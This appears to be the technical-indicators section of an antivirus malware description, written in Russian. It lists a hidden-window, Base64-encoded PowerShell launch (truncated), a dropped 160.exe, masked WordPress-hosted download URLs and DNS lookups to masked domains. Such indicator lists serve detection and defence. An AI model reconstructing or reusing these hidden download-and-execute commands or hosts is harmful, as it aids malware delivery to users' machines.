Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABXAHoAcAB0AGUAcABvAG4AcgA9ACcAQQB6AHIAaABsAHkAbQBwAHMAJwA7ACQAUgBvAGgAdgBtAHoAbgBxAHAAbAAgAD0AIAAnADEANgAwACcAOwAkAEIAaAByAHgAbwBpAGQAZABpAHUAYwA9ACcAWgBrAGsAaABwAGQAdQBzACcAOwA...
- %HOMEPATH%\160.exe
- %HOMEPATH%\160.exe
- http://sa####patil.online/wp-includes/rBhbqf/
- http://de###.#utostar.com.sa/wp-admin/tnibbgr-7y3i2-4052100/
- http://re###at.club/wp-snapshots/fzAArnYv/
- DNS ASK sa####patil.online
- DNS ASK de###.#utostar.com.sa
- DNS ASK ac#####emagicsjacks.xyz
- DNS ASK he###ghao.club
- DNS ASK re###at.club
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABXAHoAcAB0AGUAcABvAG4AcgA9ACcAQQB6AHIAaABsAHkAbQBwAHMAJwA7ACQAUgBvAGgAdgBtAHoAbgBxAHAAbAAgAD0AIAAnADEANgAwACcAOwAkAEIAaAByAHgAbwBpAGQAZABpAHUAYwA9ACcAWgBrAGsAaABwAGQAdQBzACcAOwA...' (со скрытым окном)